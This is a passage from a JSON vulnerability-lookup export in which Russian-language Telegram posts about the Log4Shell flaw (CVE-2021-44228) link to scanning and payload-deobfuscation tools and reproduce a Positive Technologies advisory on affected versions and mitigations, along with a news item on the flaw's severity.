\u0441\u0432\u0435\u0440\u0445\u0431\u044b\u0441\u0442\u0440\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4J RCE CVE-2021-44228.\nhttps://github.com/0xInfection/LogMePwn\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1\ufe0f", "creation_timestamp": "2022-04-12T15:00:37.000000Z"}, {"uuid": "ce7daff7-1b7c-4116-a8c2-32a372450ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/malwar3s/16", "content": "https://github.com/logpresso/CVE-2021-44228-Scanner", "creation_timestamp": "2022-07-11T14:51:55.000000Z"}, {"uuid": "a7baf7f6-44be-47d5-83ee-88804325a724", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/poxek/2392", "content": "#\u041d\u043e\u0432\u043e\u0441\u0442\u0438 #CVE\n\nOx4Shell - Deobfuscate Log4Shell Payloads With Ease\nCVE-2021-44228\n\n\u0421 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4Shell (CVE-2021-44228) \u0431\u044b\u043b\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 Log4Shell, \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u0432 \u0436\u0438\u0437\u043d\u044c \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u043e\u0432 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u0448\u043c\u0430\u0440.", "creation_timestamp": "2022-08-29T05:00:04.000000Z"}, {"uuid": "232bf20b-5430-41ae-8e36-d6dddfb2f280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/freeosint/702", "content": "\u0423\u0412\u0415\u0414\u041e\u041c\u041b\u0415\u041d\u0418\u0415 \u041e \u041a\u0420\u0418\u0422\u0418\u0427\u0415\u0421\u041a\u041e\u0419 \u0423\u042f\u0417\u0412\u0418\u041c\u041e\u0421\u0422\u0418 CVE-2021-44228\n\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Positive Technologies \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u044f\u0435\u0442 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u00ab\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430\u00bb (CVE-2021-44228), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u043f\u043e\u0440\u0442\u0430\u043b\u0435 GitHub 9 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u041f\u041e Apache Log4j \u0432\u0435\u0440\u0441\u0438\u0439 \u0441 2.0 \u043f\u043e 2.14.1.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0435\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438. Log4j \u2013 \u044d\u0442\u043e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 \u044f\u0437\u044b\u043a\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Java \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c\n\u043a\u043e\u0434\u043e\u043c, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u0430\u044f Apache Foundation. \u041e\u043d\u0430 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445). \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043b\u044e\u0431\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u0435 \u0432 \u0444\u0430\u0439\u043b\u044b \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438\n\u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e\u043c \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e\n\u0441\u0435\u0440\u0432\u0438\u0441\u0430. \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Positive Technologies \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0443\u0434\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0435\u0442 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u043c\u0443 \u0440\u0438\u0441\u043a\u0443 \u0442\u044b\u0441\u044f\u0447\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439.\n\n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u00ab\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430\u00bb (CVE-2021-44228) \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Positive Technologies \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c\n\u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:\n\u25cf \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435 \u041f\u041e, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u00ab\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e\u00bb, \u0443\u044f\u0437\u0432\u0438\u043c\u043e \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043b\u0443\u0447\u0430\u0435\u0432;\n\u25cf \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438;\n\u25cf \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j \u0441 2.0 \u043f\u043e 2.14.1;\n\u25cf \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 Log4j.\n\n\u0412\u043b\u0438\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 Log4j \u043e\u0447\u0435\u043d\u044c \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u043c \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Java. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\n\u0442\u0440\u0443\u0434\u043d\u043e \u043e\u0446\u0435\u043d\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0430. \u041a\u0430\u043a \u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u0442\u0430\u043a\u0438\u043c\u0438 \u043a\u0430\u043a \u00abHeartbleed\u00bb \u0438 \u00abShellshock\u00bb, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Positive Technologies \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u043d\u0435\u0434\u0435\u043b\u0438 \u0431\u0443\u0434\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432. \u0418\u0437-\u0437\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0433\u043e\u0442\u043e\u0432\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043f\u0440\u043e\u0441\u0442\u043e\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0448\u0438\u0440\u043e\u0442\u044b \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e \u043d\u0430\u0447\u043d\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\n\u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0435, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u00ab\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430\u00bb (CVE-2021-44228) \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u043b\u0438\u044f\u0442\u044c \u043d\u0430 \u0432\u0430\u0448\u0443 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Positive Technologies\n\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u044e \u043a \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c. \u041f\u0440\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u043e\u0433\u043e\n\u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0438 \u043e\u0442\u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 Log4j 2 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 2.15.0-rc2 \u0438 \u0432\u044b\u0448\u0435. \u041f\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0434\u0430\u043d\u043d\u044b\u043c, \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u041f\u041e JDK \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 \u0432\u044b\u0448\u0435 6u211, 7u201, 8u191 \u0438 11.0.1. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043c\u0435\u0440 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043f\u0440\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0435, \u0447\u0442\u043e \u0434\u043b\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b Java log4j2.formatMsgNoLookups\n\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 true. \u0415\u0441\u043b\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430, \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f\n\u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b, \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u0432\u044b\u0448\u0435, \u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439.", "creation_timestamp": "2022-01-16T17:59:03.000000Z"}, {"uuid": "02c840ff-c053-4af6-a474-97cb8c186e03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/poxek/243", "content": "\u200b\u200b\u0421\u0443\u0434\u043d\u0430\u044f \u043d\u043e\u0447\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f.\n \n0-day \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u043e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 LunaSec, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0432\u044b\u043a\u043e\u0432 \u0438 \u0443\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0434\u043d\u0443 \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u043a\u043e\u0434\u0430.\n \n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CVE-2021-44228 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apache Software Foundation \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java. Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase \u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a Log4Shell.\n \n\u0412\u0441\u0435 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043b\u043e\u0445\u043e, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 Apache Software Foundation \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 